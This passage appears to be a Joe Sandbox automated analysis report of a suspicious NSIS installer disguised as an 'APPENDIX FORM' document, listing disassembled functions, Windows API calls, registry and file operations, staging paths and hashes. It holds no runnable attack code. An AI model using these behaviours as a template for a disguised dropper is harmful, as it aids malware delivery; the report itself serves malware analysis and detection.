                                                                                                              • String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$3h)$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                              • API String ID: 2803837635-775497101
                                                                                                              • Opcode ID: 7d722e52d5d1ced09d0b69b569fd759111e039131ac18ea1231b4960ba6c6cec
                                                                                                              • Instruction ID: 9de56974c203d5571711bd7ea282ed8ac83b373a822f3244ccbcaf21db740533
                                                                                                              • Opcode Fuzzy Hash: 7d722e52d5d1ced09d0b69b569fd759111e039131ac18ea1231b4960ba6c6cec
                                                                                                              • Instruction Fuzzy Hash: 1061E471A40205ABDB20AF65DE49B9E76B8EB14315F20403BF905B72D1D7BC9D408B9C
                                                                                                              Function 10001A86 Relevance: 20.0, APIs: 13, Instructions: 538stringmemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,?), ref: 1000121D
                                                                                                                • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,?), ref: 10001258
                                                                                                                • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B90
                                                                                                              • lstrcpyA.KERNEL32(00000008,?), ref: 10001BD8
                                                                                                              • lstrcpyA.KERNEL32(00000408,?), ref: 10001BE2
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001BF5
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001CED
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001CF2
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001CF7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001E98
                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 10001FEC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$lstrcpy$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 4227406936-0
                                                                                                              • Opcode ID: 69f3a9b2a18921e2892b8c7150752c2e8c75d51f0f9cb65df36350bdcad77393
                                                                                                              • Instruction ID: 74db159a9f3e7a36040566df0065e2a6036ec1a3b8bd981beb6e548db383e329
                                                                                                              • Opcode Fuzzy Hash: 69f3a9b2a18921e2892b8c7150752c2e8c75d51f0f9cb65df36350bdcad77393
                                                                                                              • Instruction Fuzzy Hash: BA128A71D0464ADEFB20CFA4C8817EEBBF4FB043D4F21852AD555A3288DB749A81CB51
                                                                                                              Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 585 40173f-401762 call 4029ff call 4057dd 590 401764-40176a call 405ce0 585->590 591 40176c-40177e call 405ce0 call 405770 lstrcatA 585->591 596 401783-401789 call 405f4b 590->596 591->596 601 40178e-401792 596->601 602 401794-40179e call 405fe4 601->602 603 4017c5-4017c8 601->603 611 4017b0-4017c2 602->611 612 4017a0-4017ae CompareFileTime 602->612 605 4017d0-4017ec call 405971 603->605 606 4017ca-4017cb call 40594c 603->606 613 401864-40188d call 404fcb call 402f21 605->613 614 4017ee-4017f1 605->614 606->605 611->603 612->611 628 401895-4018a1 SetFileTime 613->628 629 40188f-401893 613->629 615 4017f3-401835 call 405ce0 * 2 call 405d02 call 405ce0 call 4054f4 614->615 616 401846-401850 call 404fcb 614->616 615->601 648 40183b-40183c 615->648 626 401859-40185f 616->626 630 40289d 626->630 632 4018a7-4018b2 CloseHandle 628->632 629->628 629->632 635 40289f-4028a3 630->635 633 402894-402897 632->633 634 4018b8-4018bb 632->634 633->630 637 4018d0-4018d3 call 405d02 634->637 638 4018bd-4018ce call 405d02 lstrcatA 634->638 644 4018d8-40222d call 4054f4 637->644 638->644 644->635 648->626 650 40183e-40183f 648->650 650->616
                                                                                                              APIs
                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen,00000000,00000000,00000031), ref: 0040177E
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen,00000000,00000000,00000031), ref: 004017A8
                                                                                                                • Part of subcall function 00405CE0: lstrcpynA.KERNEL32(?,?,00000400,00403289,Centraleuropisk Setup,NSIS Error), ref: 00405CED
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp$C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp\System.dll$C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen$Call
                                                                                                              • API String ID: 1941528284-2670399011
                                                                                                              • Opcode ID: 09760604a39c9fc38cc97cf03cd4f78144b4080378c59d2037bdc54a19b13dc2
                                                                                                              • Instruction ID: dcaa159d3d65cf46b394741f05a2eb50de91680975dac2d9d0f3c2bd51607c2a
                                                                                                              • Opcode Fuzzy Hash: 09760604a39c9fc38cc97cf03cd4f78144b4080378c59d2037bdc54a19b13dc2
                                                                                                              • Instruction Fuzzy Hash: 2441C671904515BADF10BB69DC46EAF3568EF01368F20823BF121B10E1DA7C4A419A6D
                                                                                                              Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401D29
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                                              • CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID: Calibri
                                                                                                              • API String ID: 3808545654-1409258342
                                                                                                              • Opcode ID: 81c73d9e8679907cff4745bd34847c755520c3b134f4d90f90dc5b578de1b815
                                                                                                              • Instruction ID: 5399a24e5cdce0b27410f2cdff9dfddad5b6d8cdd0e7a6f2869d00f867cec74d
                                                                                                              • Opcode Fuzzy Hash: 81c73d9e8679907cff4745bd34847c755520c3b134f4d90f90dc5b578de1b815
                                                                                                              • Instruction Fuzzy Hash: C0016271968340AFEB015BB0AE4AB9A3FB4E715705F108479F541B72E2C57844159B2B
                                                                                                              Function 0040303C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 666 40303c-403065 GetTickCount 667 4031a6-4031ae call 402bdc 666->667 668 40306b-403096 call 4031ce SetFilePointer 666->668 674 4031b0-4031b5 667->674 673 40309b-4030ad 668->673 675 4030b1-4030bf call 4031b8 673->675 676 4030af 673->676 679 4030c5-4030d1 675->679 680 403198-40319b 675->680 676->675 681 4030d7-4030dd 679->681 680->674 682 403108-403124 call 40610b 681->682 683 4030df-4030e5 681->683 689 4031a1 682->689 690 403126-40312e 682->690 683->682 684 4030e7-403107 call 402bdc 683->684 684->682 693 4031a3-4031a4 689->693 691 403130-403146 WriteFile 690->691 692 403162-403168 690->692 694 403148-40314c 691->694 695 40319d-40319f 691->695 692->689 696 40316a-40316c 692->696 693->674 694->695 697 40314e-40315a 694->697 695->693 696->689 698 40316e-403181 696->698 697->681 699 403160 697->699 698->673 700 403187-403196 SetFilePointer 698->700 699->698 700->667
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00403051
                                                                                                                • Part of subcall function 004031CE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA6,?), ref: 004031DC
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?,?,00402ECD,000000FF,00000000,00000000), ref: 00403084
                                                                                                              • WriteFile.KERNELBASE(0040A888,0040F981,00000000,00000000,00412888,00004000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?), ref: 0040313E
                                                                                                              • SetFilePointer.KERNELBASE(002A0792,00000000,00000000,00412888,00004000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?,?,00402ECD), ref: 00403190
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$CountTickWrite
                                                                                                              • String ID: 3h)
                                                                                                              • API String ID: 2146148272-922417944
                                                                                                              • Opcode ID: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                                                                              • Instruction ID: a35b4d635d582a079554899d3f3348b8a37966e1b02de07338691533ba46218a
                                                                                                              • Opcode Fuzzy Hash: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                                                                              • Instruction Fuzzy Hash: 8B41BF729042019FDB10AF29ED849663FFCE748356715823BE914BB2E0C7399E41DB5E
                                                                                                              Function 0040231E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 735 40231e-402364 call 402af4 call 4029ff * 2 RegCreateKeyExA 742 402894-4028a3 735->742 743 40236a-402372 735->743 745 402382-402385 743->745 746 402374-402381 call 4029ff lstrlenA 743->746 749 402395-402398 745->749 750 402387-402394 call 4029e2 745->750 746->745 751 4023a9-4023bd RegSetValueExA 749->751 752 40239a-4023a4 call 402f21 749->752 750->749 757 4023c2-402498 RegCloseKey 751->757 758 4023bf 751->758 752->751 757->742 760 402665-40266c 757->760 758->757 760->742
                                                                                                              APIs
                                                                                                              • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235C
                                                                                                              • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237C
                                                                                                              • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B5
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402492
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp
                                                                                                              • API String ID: 1356686001-3973415816
                                                                                                              • Opcode ID: 8883ba43675c8a8238c8498911ba25d19e3cba87ffe1608babd6e0b8c8001e09
                                                                                                              • Instruction ID: 5b7358e468b3e7e805740e69444adcde94b22edecb5190afa3496e3dc7040632
                                                                                                              • Opcode Fuzzy Hash: 8883ba43675c8a8238c8498911ba25d19e3cba87ffe1608babd6e0b8c8001e09
                                                                                                              • Instruction Fuzzy Hash: AD1181B1A00118BEEB10EBA4DE89EAF7678EB50358F10413AF905B61D1D6B85D01A628
                                                                                                              Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 761 4015b3-4015c6 call 4029ff call 405809 766 4015c8-4015e3 call 40579b CreateDirectoryA 761->766 767 40160a-40160d 761->767 776 401600-401608 766->776 777 4015e5-4015f0 GetLastError 766->777 769 401638-402183 call 401423 767->769 770 40160f-40162a call 401423 call 405ce0 SetCurrentDirectoryA 767->770 782 402894-4028a3 769->782 783 402665-40266c 769->783 770->782 786 401630-401633 770->786 776->766 776->767 780 4015f2-4015fb GetFileAttributesA 777->780 781 4015fd 777->781 780->776 780->781 781->776 783->782 786->782
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(?,?,luggages.con,?,00405875,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405817
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 0040581C
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 00405830
                                                                                                              • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                              • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen,00000000,00000000,000000F0), ref: 00401622
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen, xrefs: 00401617
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen
                                                                                                              • API String ID: 3751793516-3057813021
                                                                                                              • Opcode ID: ce076ba71617989824715641df4ef62626dac5c5f685b9f75a0ffb99cabb616d
                                                                                                              • Instruction ID: a7fcd4b568d892c9356fe073e55a2dcd02e69eb8fb6dd9dcb191d2df0a387b75
                                                                                                              • Opcode Fuzzy Hash: ce076ba71617989824715641df4ef62626dac5c5f685b9f75a0ffb99cabb616d
                                                                                                              • Instruction Fuzzy Hash: BB112532908150ABDB117FB51D4496F27B0EA52366728473FF491B22E2D23C0942D62E
                                                                                                              Function 004059A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 788 4059a0-4059aa 789 4059ab-4059d6 GetTickCount GetTempFileNameA 788->789 790 4059e5-4059e7 789->790 791 4059d8-4059da 789->791 793 4059df-4059e2 790->793 791->789 792 4059dc 791->792 792->793
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 004059B4
                                                                                                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059CE
                                                                                                              Strings
                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059A3, 004059A7
                                                                                                              • nsa, xrefs: 004059AB
                                                                                                              • "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe", xrefs: 004059A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                                              • API String ID: 1716503409-1641334762
                                                                                                              • Opcode ID: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                                                                              • Instruction ID: 39b4e1e9eedef81f1669a342cc471fdfd7c96e097019c4c4e899424100dca803
                                                                                                              • Opcode Fuzzy Hash: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                                                                              • Instruction Fuzzy Hash: 86F08976748204ABD7104F56DC05BDB7B99DF91760F108037F904DA180D5B499548765
                                                                                                              Function 00402A3F Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 794 402a3f-402a68 RegOpenKeyExA 795 402ad3-402ad7 794->795 796 402a6a-402a75 794->796 797 402a90-402aa0 RegEnumKeyA 796->797 798 402aa2-402ab4 RegCloseKey call 40600b 797->798 799 402a77-402a7a 797->799 807 402ab6-402ac5 798->807 808 402ada-402ae0 798->808 801 402ac7-402aca RegCloseKey 799->801 802 402a7c-402a8e call 402a3f 799->802 805 402ad0-402ad2 801->805 802->797 802->798 805->795 807->795 808->805 809 402ae2-402af0 RegDeleteKeyA 808->809 809->805 811 402af2 809->811 811->795
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A60
                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9C
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AA5
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402ACA
                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1912718029-0
                                                                                                              • Opcode ID: 2173a1222272c8fea1f402388a10c978ca0a8ff75f5850e8d405ccc6749e7504
                                                                                                              • Instruction ID: a214132de7a877a1f887ec7b259b79ce535b7ac4ce934fbe7a8c52476c4c5b6f
